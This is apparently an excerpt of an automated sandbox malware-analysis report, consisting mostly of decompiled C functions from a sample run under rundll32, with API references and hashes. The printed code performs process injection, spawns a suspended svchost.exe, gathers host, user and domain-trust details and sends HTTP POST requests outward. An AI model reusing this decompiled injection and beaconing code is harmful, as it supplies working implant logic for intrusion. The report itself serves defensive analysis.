							_t65 = WriteProcessMemory(_a4, _v8, _v12, _v20, 0); // executed
							if(_t65 != 0) {
								_v28 = 1;
								if(0 != 0) {
									continue;
								}
							} else {
							}
						}
					} else {
					}
					L17:
					if(_v12 != 0) {
						E003413D0(_v12);
					}
					if(_v8 != 0 && _v28 == 0) {
						VirtualFreeEx(_a4, _v8, 0, 0x8000);
					}
					return _v28;
				}
				goto L17;
			}















                                                  0x0034327c
                                                  0x0034327f
                                                  0x00343288
                                                  0x00343291
                                                  0x00343294
                                                  0x0034329b
                                                  0x003432a2
                                                  0x003432a9
                                                  0x003432bc
                                                  0x003432c2
                                                  0x003432c9
                                                  0x003432e2
                                                  0x003432e8
                                                  0x003432e8
                                                  0x003432ef
                                                  0x00000000
                                                  0x00000000
                                                  0x003432fa
                                                  0x003432ff
                                                  0x00343302
                                                  0x00343309
                                                  0x0034331d
                                                  0x00343322
                                                  0x00343327
                                                  0x00343329
                                                  0x0034332d
                                                  0x00343335
                                                  0x00343335
                                                  0x0034333b
                                                  0x00343349
                                                  0x00343349
                                                  0x00343361
                                                  0x00343369
                                                  0x0034336d
                                                  0x00343376
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0034336b
                                                  0x00343369
                                                  0x00000000
                                                  0x0034330b
                                                  0x0034337c
                                                  0x00343380
                                                  0x00343386
                                                  0x0034338b
                                                  0x00343392
                                                  0x003433a9
                                                  0x003433a9
                                                  0x003433b5
                                                  0x003433b5
                                                  0x00000000

                                                  APIs
                                                  • VirtualAllocEx.KERNELBASE(00000000,00341ECF,FFFFFFFF,00003000,00000040), ref: 003432BC
                                                  • VirtualAllocEx.KERNEL32(00000000,00000000,FFFFFFFF,00003000,00000040), ref: 003432DC
                                                    • Part of subcall function 00341390: GetProcessHeap.KERNEL32(?,00341886,00100000), ref: 0034139C
                                                    • Part of subcall function 00341390: RtlAllocateHeap.NTDLL(004E0000,00000000,00341886,?,00341886,00100000), ref: 003413BD
                                                  • WriteProcessMemory.KERNELBASE(00000000,00000000,00000000,FFFFFFFF,00000000), ref: 00343361
                                                  • VirtualFreeEx.KERNEL32(00000000,00000000,00000000,00008000), ref: 003433A9
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2348545446.0000000000341000.00000020.00020000.sdmp, Offset: 00340000, based on PE: true
                                                  • Associated: 00000005.00000002.2348540160.0000000000340000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000005.00000002.2348553427.0000000000344000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000005.00000002.2348559404.0000000000345000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000005.00000002.2348564612.0000000000348000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_340000_rundll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Virtual$AllocHeapProcess$AllocateFreeMemoryWrite
                                                  • String ID:
                                                  • API String ID: 2713107948-0
                                                  • Opcode ID: 26d3f7eb18b25d551af0c4004d82cbc225dd15d637bc00baec67181199dccc9e
                                                  • Instruction ID: bd334f9dc39eb7bed6d7df267e5a07808eac8a0f637791c6f5dc1255fd71d237
                                                  • Opcode Fuzzy Hash: 26d3f7eb18b25d551af0c4004d82cbc225dd15d637bc00baec67181199dccc9e
                                                  • Instruction Fuzzy Hash: A041ECB9A00209EFDB15DF94C895BAEB7F5BB48704F108558E905AB280D774BB40CF91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00341390, Relevance: 3.0, APIs: 2, Instructions: 18memoryCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00341390(long _a4) {
				void* _t4;
				void* _t6;

				if( *0x34715c == 0) {
					 *0x34715c = GetProcessHeap();
				}
				if( *0x34715c == 0) {
					return 0;
				} else {
					_t6 =  *0x34715c; // 0x4e0000
					_t4 = RtlAllocateHeap(_t6, 0, _a4); // executed
					return _t4;
				}
			}





                                                  0x0034139a
                                                  0x003413a2
                                                  0x003413a2
                                                  0x003413ae
                                                  0x00000000
                                                  0x003413b0
                                                  0x003413b6
                                                  0x003413bd
                                                  0x00000000
                                                  0x003413bd

                                                  APIs
                                                  • GetProcessHeap.KERNEL32(?,00341886,00100000), ref: 0034139C
                                                  • RtlAllocateHeap.NTDLL(004E0000,00000000,00341886,?,00341886,00100000), ref: 003413BD
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2348545446.0000000000341000.00000020.00020000.sdmp, Offset: 00340000, based on PE: true
                                                  • Associated: 00000005.00000002.2348540160.0000000000340000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000005.00000002.2348553427.0000000000344000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000005.00000002.2348559404.0000000000345000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000005.00000002.2348564612.0000000000348000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_340000_rundll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$AllocateProcess
                                                  • String ID:
                                                  • API String ID: 1357844191-0
                                                  • Opcode ID: 0143b3bf0a7d0202e7e5f547db4947834e8fdc1f79d2400bb41416e92837fd7f
                                                  • Instruction ID: c00818e2851e0583ffa857bffbb5d6a9a7207227db6b0c1e71110e6a89536cd0
                                                  • Opcode Fuzzy Hash: 0143b3bf0a7d0202e7e5f547db4947834e8fdc1f79d2400bb41416e92837fd7f
                                                  • Instruction Fuzzy Hash: 4BE0BD39208685DBD34A9FA1EC0CB2577ECA307385F018424AA058EBA0DB75B898CF50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 003428D0, Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 188stringnetworkCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  C-Code - Quality: 100%
                                                  			E003428D0(char* _a4, CHAR* _a8, void* _a12, intOrPtr _a16, DWORD* _a20) {
				void* _v8;
				void* _v12;
				signed short _v16;
				signed int _v20;
				void _v24;
				void _v28;
				void* _v32;
				int _v36;
				long _v40;
				int _v44;
				int _v48;
				long _v52;
				intOrPtr _v64;
				char* _v68;
				signed short _v88;
				intOrPtr _v92;
				char* _v96;
				long _v100;
				void* _v112;
				char _v372;
				char _v632;
				void* _t86;
				int _t90;
				int _t100;
				void* _t145;

				E003414A0( &_v112, 0, 0x3c);
				_v112 = 0x3c;
				_v96 =  &_v372;
				_v92 = 0x104;
				_v68 =  &_v632;
				_v64 = 0x104;
				_v36 = 0;
				_v44 = lstrlenA("Content-Type: application/x-www-form-urlencoded");
				 *((char*)(_t145 + 0xfffffffffffffe90)) = 0;
				 *((char*)(_t145 + 0xfffffffffffffd8c)) = 0;
				if(_a8 != 0) {
					_v36 = lstrlenA(_a8);
				}
				if(InternetCrackUrlA(_a4, 0, 0,  &_v112) != 0) {
					if(_v100 == 0) {
						_v100 = 3;
					}
					if(_v100 == 3 || _v100 == 4) {
						_v32 = E003424F0();
						if(_v32 != 0) {
							_v16 = _v88;
							_v20 = 0x84080100;
							if(_v100 == 4) {
								_v20 = _v20 | 0x00803000;
							}
							_t86 = InternetConnectA(_v32,  &_v372, _v16 & 0x0000ffff, 0, 0, 3, 0, 0); // executed
							_v12 = _t86;
							if(_v12 != 0) {
								_v8 = HttpOpenRequestA(_v12, "POST",  &_v632, 0, 0, 0x347048, _v20, 0);
								if(_v8 != 0) {
									if(_v100 == 4) {
										_v40 = 4;
										InternetQueryOptionA(_v8, 0x1f,  &_v24,  &_v40);
										_v24 = _v24 | 0x00001100;
										InternetSetOptionA(_v8, 0x1f,  &_v24, 4);
									}
									_t90 = HttpSendRequestA(_v8, "Content-Type: application/x-www-form-urlencoded", _v44, _a8, _v36); // executed
									_v48 = _t90;
									_v28 = 0;
									if(_v48 == 1) {
										_v52 = 4;
										HttpQueryInfoA(_v8, 0x20000013,  &_v28,  &_v52, 0);
										if(_v28 == 0xc8 && _a12 != 0) {
											_t100 = InternetReadFile(_v8, _a12, _a16 - 1, _a20); // executed
											if(_t100 == 0 ||  *_a20 <= 0) {
												 *_a20 = 0;
											} else {
												 *((char*)(_a12 +  *_a20)) = 0;
											}
										}
									}
									InternetCloseHandle(_v8);
									InternetCloseHandle(_v12);
									if(_v28 != 0xc8) {
										return 0;
									} else {
										return 1;
									}
								}
								InternetCloseHandle(_v12);
								return 0;
							} else {
								return 0;
							}
						}
						return 0;
					} else {
						return 0;
					}
				}
				return 0;
			}




























                                                  0x003428e1
                                                  0x003428e9
                                                  0x003428f6
                                                  0x003428f9
                                                  0x00342906
                                                  0x00342909
                                                  0x00342910
                                                  0x00342922
                                                  0x0034292d
                                                  0x0034293d
                                                  0x00342949
                                                  0x00342955
                                                  0x00342955
                                                  0x0034296c
                                                  0x00342979
                                                  0x0034297b
                                                  0x0034297b
                                                  0x00342986
                                                  0x0034299a
                                                  0x003429a1
                                                  0x003429ae
                                                  0x003429b2
                                                  0x003429bd
                                                  0x003429c8
                                                  0x003429c8
                                                  0x003429e5
                                                  0x003429eb
                                                  0x003429f2
                                                  0x00342a20
                                                  0x00342a27
                                                  0x00342a3e
                                                  0x00342a40
                                                  0x00342a55
                                                  0x00342a64
                                                  0x00342a73
                                                  0x00342a73
                                                  0x00342a8e
                                                  0x00342a94
                                                  0x00342a97
                                                  0x00342aa2
                                                  0x00342aa4
                                                  0x00342abe
                                                  0x00342acb
                                                  0x00342ae6
                                                  0x00342aee
                                                  0x00342b09
                                                  0x00342af8
                                                  0x00342b00
                                                  0x00342b00
                                                  0x00342aee
                                                  0x00342acb
                                                  0x00342b13
                                                  0x00342b1d
                                                  0x00342b2a
                                                  0x00000000
                                                  0x00342b2c
                                                  0x00000000
                                                  0x00342b2c
                                                  0x00342b2a
                                                  0x00342a2d
                                                  0x00000000
                                                  0x003429f4
                                                  0x00000000
                                                  0x003429f4
                                                  0x003429f2
                                                  0x00000000
                                                  0x0034298e
                                                  0x00000000
                                                  0x0034298e
                                                  0x00342986
                                                  0x00000000

                                                  APIs
                                                  • lstrlenA.KERNEL32(Content-Type: application/x-www-form-urlencoded), ref: 0034291C
                                                  • lstrlenA.KERNEL32(00000000), ref: 0034294F
                                                    • Part of subcall function 003424F0: InternetOpenA.WININET(Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko,00000000,00000000,00000000,00000000), ref: 00342509
                                                  • InternetCrackUrlA.WININET(?,00000000,00000000,0000003C), ref: 00342964
                                                  • InternetConnectA.WININET(00000000,00000000,00000000,00000000,00000000,00000003,00000000,00000000), ref: 003429E5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2348545446.0000000000341000.00000020.00020000.sdmp, Offset: 00340000, based on PE: true
                                                  • Associated: 00000005.00000002.2348540160.0000000000340000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000005.00000002.2348553427.0000000000344000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000005.00000002.2348559404.0000000000345000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000005.00000002.2348564612.0000000000348000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_340000_rundll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Internet$lstrlen$ConnectCrackOpen
                                                  • String ID: <$Content-Type: application/x-www-form-urlencoded$POST
                                                  • API String ID: 4167639401-2842678110
                                                  • Opcode ID: 3595bb47926ef8f080fb817a90724f24a3a64da1ae93db496ba4ea63610bea91
                                                  • Instruction ID: 0e011465b4d3634adec189868b0ea3c5af0a6a8ec3d501a48a41a91f0fce5002
                                                  • Opcode Fuzzy Hash: 3595bb47926ef8f080fb817a90724f24a3a64da1ae93db496ba4ea63610bea91
                                                  • Instruction Fuzzy Hash: EF71FB75904209EFDB16DFA4C849BEFB7B9FB49700F508529F605AF280D7B4AA44CB90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00343000, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 85COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 130 343000-34301e OpenProcess 131 343027-34303c OpenProcessToken 130->131 132 343020-343022 130->132 134 343045-343062 GetTokenInformation 131->134 135 34303e-343040 131->135 133 3430e7-3430ea 132->133 136 343064-34306d GetLastError 134->136 137 34306f-343071 134->137 135->133 136->137 138 343073-3430a9 call 341390 GetTokenInformation 136->138 137->133 141 3430d8-3430e4 call 3413d0 138->141 142 3430ab-3430cf LookupAccountSidA 138->142 141->133 142->141 143 3430d1 142->143 143->141
                                                  C-Code - Quality: 100%
                                                  			E00343000(long _a4, CHAR* _a8, long _a12, CHAR* _a16, long _a20) {
				long _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				union _TOKEN_INFORMATION_CLASS _v28;
				union _SID_NAME_USE _v32;
				int _t31;
				int _t37;
				int _t43;

				_v12 = OpenProcess(0x400, 0, _a4);
				if(_v12 != 0) {
					if(OpenProcessToken(_v12, 0x20008,  &_v16) != 0) {
						_v8 = 0;
						_t31 = GetTokenInformation(_v16, 1, 0, 0,  &_v8); // executed
						if(_t31 != 0 || GetLastError() != 0x7a) {
							return 0;
						} else {
							_v24 = E00341390(_v8);
							_v20 = _v24;
							_v28 = 0;
							_t37 = GetTokenInformation(_v16, 1, _v20, _v8,  &_v8); // executed
							if(_t37 != 0) {
								_t43 = LookupAccountSidA(0,  *_v20, _a8,  &_a12, _a16,  &_a20,  &_v32); // executed
								if(_t43 != 0) {
									_v28 = 1;
								}
							}
							E003413D0(_v24);
							return _v28;
						}
					}
					return 0;
				}
				return 0;
			}













                                                  0x00343017
                                                  0x0034301e
                                                  0x0034303c
                                                  0x00343045
                                                  0x0034305a
                                                  0x00343062
                                                  0x00000000
                                                  0x00343073
                                                  0x0034307f
                                                  0x00343085
                                                  0x00343088
                                                  0x003430a1
                                                  0x003430a9
                                                  0x003430c7
                                                  0x003430cf
                                                  0x003430d1
                                                  0x003430d1
                                                  0x003430cf
                                                  0x003430dc
                                                  0x00000000
                                                  0x003430e4
                                                  0x00343062
                                                  0x00000000
                                                  0x0034303e
                                                  0x00000000

                                                  APIs
                                                  • OpenProcess.KERNEL32(00000400,00000000,?,?,00342E45,?,?,00000104,?,00000104), ref: 00343011
                                                  • OpenProcessToken.ADVAPI32(00000000,00020008,00000104,?,00342E45,?,?,00000104), ref: 00343034
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2348545446.0000000000341000.00000020.00020000.sdmp, Offset: 00340000, based on PE: true
                                                  • Associated: 00000005.00000002.2348540160.0000000000340000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000005.00000002.2348553427.0000000000344000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000005.00000002.2348559404.0000000000345000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000005.00000002.2348564612.0000000000348000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_340000_rundll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: OpenProcess$Token
                                                  • String ID: E.4
                                                  • API String ID: 2935449343-2745396128
                                                  • Opcode ID: 38561ebc931fc88a4e850bda0dc177466f9134a5aafad5656af3720e6b8b5161
                                                  • Instruction ID: a93c67df3b1923dfef915fefa336eee28bd4bbca943e9dc500baa679d7bf9e0a
                                                  • Opcode Fuzzy Hash: 38561ebc931fc88a4e850bda0dc177466f9134a5aafad5656af3720e6b8b5161
                                                  • Instruction Fuzzy Hash: 9731EFB9A00209AFDB11DFA4DD85FAEB7FCAB48704F104558E606EB180E771BA44CB61
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00342C40, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 47processstringCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 164 342c40-342cb1 call 3414a0 GetEnvironmentVariableA lstrcatA CreateProcessA 167 342cb7-342cc7 164->167 168 342cb3-342cb5 164->168 169 342ccc-342ccf 167->169 168->169
                                                  C-Code - Quality: 100%
                                                  			E00342C40(void** _a4, intOrPtr* _a8) {
				struct _PROCESS_INFORMATION _v20;
				struct _STARTUPINFOA _v88;
				char _v348;
				int _t17;

				E003414A0( &_v88, 0, 0x44);
				_v88.cb = 0x44;
				GetEnvironmentVariableA("SystemRoot",  &_v348, 0x104);
				lstrcatA( &_v348, "\\System32\\svchost.exe");
				_t17 = CreateProcessA(0,  &_v348, 0, 0, 0, 0x424, 0, 0,  &_v88,  &_v20); // executed
				if(_t17 != 0) {
					 *_a4 = _v20.hProcess;
					 *_a8 = _v20.hThread;
					return 1;
				}
				return 0;
			}







                                                  0x00342c51
                                                  0x00342c59
                                                  0x00342c71
                                                  0x00342c83
                                                  0x00342ca9
                                                  0x00342cb1
                                                  0x00342cbd
                                                  0x00342cc5
                                                  0x00000000
                                                  0x00342cc7
                                                  0x00000000

                                                  APIs
                                                  • GetEnvironmentVariableA.KERNEL32(SystemRoot,?,00000104), ref: 00342C71
                                                  • lstrcatA.KERNEL32(?,\System32\svchost.exe), ref: 00342C83
                                                  • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000424,00000000,00000000,00000044,?), ref: 00342CA9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2348545446.0000000000341000.00000020.00020000.sdmp, Offset: 00340000, based on PE: true
                                                  • Associated: 00000005.00000002.2348540160.0000000000340000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000005.00000002.2348553427.0000000000344000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000005.00000002.2348559404.0000000000345000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000005.00000002.2348564612.0000000000348000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_340000_rundll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateEnvironmentProcessVariablelstrcat
                                                  • String ID: D$SystemRoot$\System32\svchost.exe
                                                  • API String ID: 3510847443-1175289849
                                                  • Opcode ID: f8d909e17a2f3796ff100dd3c05c911b23715c00c429a0baf50e6c26f6e354b2
                                                  • Instruction ID: 2b2e1f613ac1d9e4c97c6a04afe5618b984a33c2c1bf5b89be8eb1dccda8d13e
                                                  • Opcode Fuzzy Hash: f8d909e17a2f3796ff100dd3c05c911b23715c00c429a0baf50e6c26f6e354b2
                                                  • Instruction Fuzzy Hash: 1F011275A40309ABE711DFD0DC46FE9B7B8EB44B05F504554FB09AE2C0EAB47A488B64
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00342520, Relevance: 9.0, APIs: 3, Strings: 3, Instructions: 42stringCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 181 342520-342535 182 342537-34254b lstrcpyA 181->182 183 34254d-34255d call 341fe0 181->183 184 3425aa-3425ad 182->184 186 342562-342568 183->186 187 34258a-3425a8 lstrcpyA 186->187 188 34256a-342588 lstrcpyA 186->188 187->184 188->184
                                                  C-Code - Quality: 100%
                                                  			E00342520(void* __ecx, CHAR* _a4) {
				char _v8;
				void* _t10;

				if( *0x00347280 == 0) {
					_t10 = E00341FE0("http://api.ipify.org", "84.17.52.8", 0x20,  &_v8); // executed
					if(_t10 != 1) {
						 *((char*)(0x347280)) = 0;
						lstrcpyA(_a4, "0.0.0.0");
						return 0;
					}
					 *((char*)(_v8 + 0x347280)) = 0;
					lstrcpyA(_a4, "84.17.52.8");
					return 1;
				}
				lstrcpyA(_a4, "84.17.52.8");
				return 1;
			}





                                                  0x00342535
                                                  0x0034255d
                                                  0x00342568
                                                  0x00342592
                                                  0x003425a2
                                                  0x00000000
                                                  0x003425a8
                                                  0x0034256d
                                                  0x0034257d
                                                  0x00000000
                                                  0x00342583
                                                  0x00342540
                                                  0x00000000

                                                  APIs
                                                  • lstrcpyA.KERNEL32(00341AD9,84.17.52.8,?,?,00341AD9,?,?), ref: 00342540
                                                  • lstrcpyA.KERNEL32(00341AD9,84.17.52.8,?,?,00341AD9,?,?), ref: 0034257D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2348545446.0000000000341000.00000020.00020000.sdmp, Offset: 00340000, based on PE: true
                                                  • Associated: 00000005.00000002.2348540160.0000000000340000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000005.00000002.2348553427.0000000000344000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000005.00000002.2348559404.0000000000345000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000005.00000002.2348564612.0000000000348000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_340000_rundll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcpy
                                                  • String ID: 0.0.0.0$84.17.52.8$http://api.ipify.org
                                                  • API String ID: 3722407311-370145731
                                                  • Opcode ID: 5345df30a754da7a0687b7a6706bdb1361fd69fe9d64c2d576a66b9d9d563b42
                                                  • Instruction ID: 5edd15c8f3346ff7a9769d72b23675d7e44871b5cfab491f3d62176dca30799f
                                                  • Opcode Fuzzy Hash: 5345df30a754da7a0687b7a6706bdb1361fd69fe9d64c2d576a66b9d9d563b42
                                                  • Instruction Fuzzy Hash: 7901DB7470820467D756C764CC1ABDABBD8E705300F514AA4F904DF281C7F6F98147A0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 003430F0, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39stringCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 229 3430f0-343122 GetComputerNameA 230 343124-34312f lstrcatA 229->230 231 343135-343155 lstrcatA call 342df0 229->231 230->231 234 343157-343162 lstrcatA 231->234 235 343168-343170 231->235 234->235
                                                  C-Code - Quality: 100%
                                                  			E003430F0(CHAR* _a4) {
				long _v8;
				char _v268;
				char _v528;
				int _t14;
				void* _t16;

				 *_a4 = 0;
				_v8 = 0x104;
				_t14 = GetComputerNameA( &_v268,  &_v8); // executed
				_t31 = _t14;
				if(_t14 != 0) {
					lstrcatA(_a4,  &_v268);
				}
				lstrcatA(_a4, " @ ");
				_t16 = E00342DF0(_t31,  &_v528); // executed
				if(_t16 != 0) {
					lstrcatA(_a4,  &_v528);
				}
				return 1;
			}








                                                  0x00343104
                                                  0x00343108
                                                  0x0034311a
                                                  0x00343120
                                                  0x00343122
                                                  0x0034312f
                                                  0x0034312f
                                                  0x0034313e
                                                  0x0034314b
                                                  0x00343155
                                                  0x00343162
                                                  0x00343162
                                                  0x00343170

                                                  APIs
                                                  • GetComputerNameA.KERNEL32(?,00000104), ref: 0034311A
                                                  • lstrcatA.KERNEL32(00100000,?), ref: 0034312F
                                                  • lstrcatA.KERNEL32(00100000, @ ), ref: 0034313E
                                                  • lstrcatA.KERNEL32(00100000,?), ref: 00343162
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2348545446.0000000000341000.00000020.00020000.sdmp, Offset: 00340000, based on PE: true
                                                  • Associated: 00000005.00000002.2348540160.0000000000340000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000005.00000002.2348553427.0000000000344000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000005.00000002.2348559404.0000000000345000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000005.00000002.2348564612.0000000000348000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_340000_rundll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcat$ComputerName
                                                  • String ID: @
                                                  • API String ID: 2583549208-203157567
                                                  • Opcode ID: 6b4b2adfa9a7fbedef8a4cb1af6e55340780de5b611e4909c4c990e56c58b0d4
                                                  • Instruction ID: 94d90bd3b88c740f7e9e1d0a4d53cfe9e12ed3465e41a96cbd8478d17a35ebdf
                                                  • Opcode Fuzzy Hash: 6b4b2adfa9a7fbedef8a4cb1af6e55340780de5b611e4909c4c990e56c58b0d4
                                                  • Instruction Fuzzy Hash: 110186B9500308ABDB15DFA4DC49BDAB7BCAB45300F0045A8FA498F251DB75FB84CB90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 003423C0, Relevance: 7.6, APIs: 5, Instructions: 65COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 236 3423c0-3423e9 DsEnumerateDomainTrustsA 237 3423f2-3423f6 236->237 238 3423eb-3423ed 236->238 240 342402-342409 237->240 241 3423f8-3423fd 237->241 239 342487-34248a 238->239 242 342414-34241a 240->242 241->239 243 342482 242->243 244 34241c-342427 242->244 243->239 245 34244d-342459 244->245 246 342429-342447 lstrcatA * 2 244->246 247 342480 245->247 248 34245b-34247a lstrcatA * 2 245->248 246->245 247->242 248->247
                                                  C-Code - Quality: 75%
                                                  			E003423C0(CHAR* _a4) {
				signed int _v8;
				char _v12;
				char _v16;
				char* _t30;

				 *_a4 = 0;
				_t30 =  &_v16;
				__imp__DsEnumerateDomainTrustsA(0, 0x3f,  &_v12, _t30); // executed
				if(_t30 == 0) {
					if(_v16 != 0) {
						_v8 = 0;
						while(_v8 < _v16) {
							if( *(_v12 + _v8 * 0x2c) != 0) {
								lstrcatA(_a4,  *(_v12 + _v8 * 0x2c));
								lstrcatA(_a4, ";");
							}
							if( *((intOrPtr*)(_v12 + 4 + _v8 * 0x2c)) != 0) {
								_t26 = 4 + _v8 * 0x2c; // 0xff25f845
								lstrcatA(_a4,  *(_v12 + _t26));
								lstrcatA(_a4, ";");
							}
							_v8 = _v8 + 1;
						}
						return 1;
					}
					return 1;
				}
				return 0;
			}







                                                  0x003423d1
                                                  0x003423d5
                                                  0x003423e1
                                                  0x003423e9
                                                  0x003423f6
                                                  0x00342402
                                                  0x00342414
                                                  0x00342427
                                                  0x00342438
                                                  0x00342447
                                                  0x00342447
                                                  0x00342459
                                                  0x00342462
                                                  0x0034246b
                                                  0x0034247a
                                                  0x0034247a
                                                  0x00342411
                                                  0x00342411
                                                  0x00000000
                                                  0x00342482
                                                  0x00000000
                                                  0x003423f8
                                                  0x00000000

                                                  APIs
                                                  • DsEnumerateDomainTrustsA.NETAPI32(00000000,0000003F,00341AE8,?,?,00341AE8,?,?,?), ref: 003423E1
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2348545446.0000000000341000.00000020.00020000.sdmp, Offset: 00340000, based on PE: true
                                                  • Associated: 00000005.00000002.2348540160.0000000000340000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000005.00000002.2348553427.0000000000344000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000005.00000002.2348559404.0000000000345000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000005.00000002.2348564612.0000000000348000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_340000_rundll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: DomainEnumerateTrusts
                                                  • String ID:
                                                  • API String ID: 4051863571-0
                                                  • Opcode ID: efb5255b167c55bf7aa96ad904c77e17e679bf0017789df3ab1d1c5992f13b3a
                                                  • Instruction ID: c64ad916bb04454d3fbf79c065d7f0f8b3da79d325c4aa996ba01f4caf76d32f
                                                  • Opcode Fuzzy Hash: efb5255b167c55bf7aa96ad904c77e17e679bf0017789df3ab1d1c5992f13b3a
                                                  • Instruction Fuzzy Hash: E4215335500209EBCB19CF95D985FAEBBB9EB44300F5081A8F505AF2A0C730FA81DB90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00342DF0, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47stringCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 250 342df0-342e4a call 342e90 call 343000 255 342e84 250->255 256 342e4c-342e82 lstrcpyA lstrcatA * 2 250->256 257 342e86-342e89 255->257 256->257
                                                  C-Code - Quality: 100%
                                                  			E00342DF0(void* __eflags, CHAR* _a4) {
				long _v8;
				long _v12;
				long _v16;
				char _v276;
				char _v536;
				long _t16;
				void* _t20;

				_t16 = E00342E90("explorer.exe"); // executed
				_v16 = _t16;
				_v12 = 0x104;
				_v8 = 0x104;
				 *_a4 = 0;
				_t20 = E00343000(_v16,  &_v536, _v12,  &_v276, _v8); // executed
				if(_t20 == 0) {
					return 0;
				}
				lstrcpyA(_a4,  &_v276);
				lstrcatA(_a4, "\\");
				lstrcatA(_a4,  &_v536);
				return 1;
			}










                                                  0x00342dfe
                                                  0x00342e06
                                                  0x00342e09
                                                  0x00342e10
                                                  0x00342e22
                                                  0x00342e40
                                                  0x00342e4a
                                                  0x00000000
                                                  0x00342e84
                                                  0x00342e57
                                                  0x00342e66
                                                  0x00342e77
                                                  0x00000000

                                                  APIs
                                                    • Part of subcall function 00342E90: K32EnumProcesses.KERNEL32(?,00001000,00342E03), ref: 00342EAD
                                                    • Part of subcall function 00343000: OpenProcess.KERNEL32(00000400,00000000,?,?,00342E45,?,?,00000104,?,00000104), ref: 00343011
                                                  • lstrcpyA.KERNEL32(00000104,?), ref: 00342E57
                                                  • lstrcatA.KERNEL32(00000104,003442B8), ref: 00342E66
                                                  • lstrcatA.KERNEL32(00000104,?), ref: 00342E77
                                                  Strings
                                                  Memory Dump Source
